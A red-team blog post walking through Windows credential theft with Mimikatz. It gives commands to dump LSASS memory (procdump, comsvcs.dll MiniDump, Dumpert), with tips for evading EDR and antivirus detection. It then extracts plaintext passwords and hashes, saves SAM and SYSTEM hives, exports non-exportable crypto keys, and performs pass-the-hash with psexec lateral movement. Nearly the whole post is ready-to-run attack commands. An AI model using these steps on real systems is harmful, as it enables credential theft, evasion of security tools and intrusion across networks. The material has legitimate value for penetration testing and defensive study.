Mimikatz

by | Aug 12, 2019 | Red team, Security, Windows | 0 comments

Reading Time: 2 minutes

 

 Official Doc : https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

 

Dump memory of LSASS :

 

Don’t forget you need to be admin to be able to do it.

 

with ProcDump from Sysinternals :

  

 

procdump.exe -accepteula -ma lsass.exe lsass.dmp

 or if not available locally :

 net use Z: https://live.sysinternals.com

Z:\procdump.exe /AcceptEula -ma lsass.exe lsass.dmp

 

Some EDR will trigger on the words “procdump” & “lsass”. Best is to dump via PID.

 Find process number for lsass.exe : tasklist /fi “imagename eq lsass.exe” return s PID for example 1234

 and then procdump.exe -accepteula -ma 1234 lsass.dmp

 

You could also manually achieve this :

 

With TaskManager : tab Details / Select lsass.exe / right click – Create Dump

 

  

If you EDR or Anti-virus has blocked you all along, then you can look at this beautifull peace of code.

 https://github.com/outflanknl/Dumpert this tool will unhook you in case if there is a hook in place by the AV and then dump the lsass memory. 

 

The LOLBAS way is the following : 

 rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"

 (Detected by PaloAlto XDR solution)

Or you can get my version here (https://github.com/k4nfr3/Dumpert) See article https://www.bussink.net/lsass-minidump-file-seen-as-malicious-by-mcafee-av/

  

 

 

After dumping the memory, what next ?

  

Analyse Dump file with Mimikatz (on the PC or remotely where there is no AV running)

 

 

Switch to minidump :

  

mimikatz # sekurlsa::minidump lsass.dmp

 

Dump all passwords :

  

mimikatz # sekurlsa::logonPasswords

 

 

Dump hashes of local accounts / SAM Files

 

Official Doc : https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump

 

You can backup SYSTEM & SAM hives with:

 reg save HKLM\SYSTEM SystemBkup.hiv

reg save HKLM\SAM SamBkup.hiv

 mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

 

or do a 

 mimikatz # privilege::debug

mimikatz # token::elevate
mimikatz # lsadump::sam

 

Or use Volume Shadow Copy / BootCD to backup these files:

 

C:\Windows\System32\config\SYSTEM

C:\Windows\System32\config\SAM

 

mimikatz # lsadump::sam /system:E:\SYSTEM /sam:E:\SAM

 

Dump Crypto Keys 

 

Official doc : https://github.com/gentilkiwi/mimikatz/wiki/module-~-crypto

  mimikatz # crypto::keys /export

 mimikatz # crypto::capi (to bypass non-exportable keys to be exported)

 

 Pass the hash

 1st get PsExec from SysInternals https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

 

mimikatz # skurlsa::pth /user:foundadmin /domain:thedomain /ntlm:xxxxxxxxx

 

this will start a new command prompt where whoami command still returns yourself, but this process has the token of foundadmin

 

run the lateral mouvement with psexec now with the new auth token

 psexec \\otherhost cmd

 

whoami will return foundadmin

 

 

 

 

0

Submit a Comment

Your email address will not be published. Required fields are marked *